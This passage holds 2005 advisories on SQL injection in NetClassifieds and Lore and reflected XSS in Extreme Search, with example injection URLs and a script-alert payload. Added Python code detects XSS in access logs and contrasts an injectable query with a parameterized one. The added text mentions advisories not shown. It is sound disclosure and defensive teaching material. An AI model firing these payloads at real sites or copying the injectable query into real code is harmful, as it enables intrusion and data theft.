    NetClassifieds Premium Edition 1.0.1
    NetClassifieds Professional Edition 1.5.1
    NetClassifieds Standard Edition 1.9.6.3
    NetClassifieds Free Edition 1.0.1


    Vuln. Description:

    Input passed to the "CatID" parameter in "ViewCat.php" and "gallery.php", and to the "ItemNum" parameter in "ViewItem.php", isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


    examples:
    /ViewCat.php?CatID=[SQL]
    /gallery.php?CatID=[SQL]
    /ViewItem.php?ItemNum=[SQL]

    Solution:

    Edit the source code to ensure that input is properly sanitised.

    Extreme Search Corporate Edition 6.x XSS vuln.

    Vuln. discovered by : r0t
    Date: 1 dec. 2005
    Vendor:http://www.extremecorporate.com/index-new.html
    affected version:6.0 and prior

    Product Description:
    Power your web site with this premium pay per click search engine. This internet software is a combination of fast PHP code and very secure Perl code. It features an expansive category editor section and a separate affiliate program section.

    Vuln. Description:
    Input passed to the "search" parameter in "extremesearch.php" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    example:
    /search/extremesearch.php?search=%3Cscript%3E
    alert%28%27r0t+XSS%27%29%3C%2Fscript%3E&lang=


    Solution:
    Edit the source code to ensure that input is properly sanitised.
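As an added detection example (not part of the original advisories, and not any vendor's code), the following Python scans web-server access-log lines for the reflected-XSS request pattern shown in the examples above, including the double-encoded form (%253C for "<") used by the InfoSpace metasearch URLs, where the payload sits in the path rather than the query string. The log lines, host names and client addresses are constructed for the demonstration.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed access-log lines (Common Log Format) modelled on the
# advisories' example URLs; hosts and client addresses are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Dec/2005:10:15:01 +0000] "GET /boards/search_results.php?uSearchString=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E HTTP/1.1" 200 5123
203.0.113.5 - - [01/Dec/2005:11:02:44 +0000] "GET /info.wbcrwl/search/web/%253Cscript%253Ealert(%2527r0t%2527)%253C%252Fscript%253E/1/-/1 HTTP/1.1" 200 8876
198.51.100.7 - - [01/Dec/2005:11:03:10 +0000] "GET /search.php?keywords=php+tutorial HTTP/1.1" 200 3301
198.51.100.7 - - [01/Dec/2005:11:04:22 +0000] "GET /search.jsp?oe=english&q=a%3Cb+%26+c%3Ed&qor= HTTP/1.1" 200 2210
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)

def decode_fully(value, max_rounds=5):
    """Percent-decode until the value stops changing, so the double-encoded
    form (%253C -> %3C -> <) is unwrapped as well as the single-encoded one."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def decoded_fields(url):
    """Yield (location, decoded_text) for every path segment and query
    parameter; the examples carry the payload in either place."""
    parts = urlsplit(url)
    for segment in parts.path.split("/"):
        if segment:
            yield "path", decode_fully(segment)
    # parse_qsl does one decoding round itself; decode_fully finishes the job
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        yield "query:" + name, decode_fully(raw)

def find_reflected_script(line):
    """Return the suspicious (location, decoded_text) pairs in one log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    return [(where, text) for where, text in decoded_fields(match.group(1))
            if SCRIPT_RE.search(text)]

def scan_log(text):
    """Map each flagged line number (1-based) to its findings."""
    hits = {}
    for number, line in enumerate(text.splitlines(), start=1):
        findings = find_reflected_script(line)
        if findings:
            hits[number] = findings
    return hits

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG).items():
        for where, text in findings:
            print(f"line {number}: {where}: {text}")
```

The fourth constructed line contains a bare "<" in a search term and is deliberately not flagged, so the check keys on the script tag after full decoding rather than on any angle bracket.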

    Lore SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 1 dec. 2005
    Vendor:http://www.pineappletechnologies.com/products/lore/
    affected version: Tested on 1.5.4

    Product Description:
    Lore is a professional knowledge base management system powered by PHP and MySQL.
    Lore allows you to quickly and easily organize frequently asked questions, articles, and documentation into a categorized and searchable knowledge base.

    Vuln. Description:
    Input passed to the "id" parameter in "article.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /article.php?id=1[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.
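The Lore "id", NetClassifieds "CatID"/"ItemNum" and ClickBank "keywords" advisories above all describe the same defect, a request parameter pasted into SQL text. As an added example (not part of the original advisories, and not any of those products' code), the following Python shows that pattern next to the fix the "Solution" lines ask for: allow-list validation of the id plus a bound query parameter. The in-memory table, its rows and the handler names are assumptions made for the demonstration.

```python
import re
import sqlite3

# Constructed in-memory stand-in for a knowledge-base article table; the
# schema and rows are assumptions, not the real layout of any product above.
ARTICLES = [
    (1, "Resetting a password", "Use the reset link on the login page."),
    (2, "Internal: VPN setup", "Staff-only instructions for the VPN."),
]
ARTICLE_ID_RE = re.compile(r"[1-9][0-9]*")

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO article VALUES (?, ?, ?)", ARTICLES)
    return conn

def fetch_article_unsafe(conn, raw_id):
    """The pattern the advisories describe: the query-string value is pasted
    into the SQL text, so a crafted value rewrites the WHERE clause."""
    sql = "SELECT id, title FROM article WHERE id = " + raw_id
    return conn.execute(sql).fetchall()

def parse_article_id(raw_id):
    """Allow-list validation: an article id is a positive decimal integer."""
    if not ARTICLE_ID_RE.fullmatch(raw_id):
        raise ValueError("article id must be a positive integer")
    return int(raw_id)

def fetch_article_safe(conn, raw_id):
    """Validate, then bind the value as a query parameter: the driver sends
    it as data, never as SQL text, which is stronger than 'sanitising'."""
    article_id = parse_article_id(raw_id)
    return conn.execute("SELECT id, title FROM article WHERE id = ?",
                        (article_id,)).fetchall()

def handle_request(conn, raw_id):
    """What the page handler should return: 400 on bad input, 404 on no row."""
    try:
        rows = fetch_article_safe(conn, raw_id)
    except ValueError:
        return 400, []
    return (200, rows) if rows else (404, [])

if __name__ == "__main__":
    db = make_db()
    print("unsafe, id=1        ->", fetch_article_unsafe(db, "1"))
    print("unsafe, id=1 OR 1=1 ->", fetch_article_unsafe(db, "1 OR 1=1"))
    print("safe,   id=1 OR 1=1 ->", handle_request(db, "1 OR 1=1"))
```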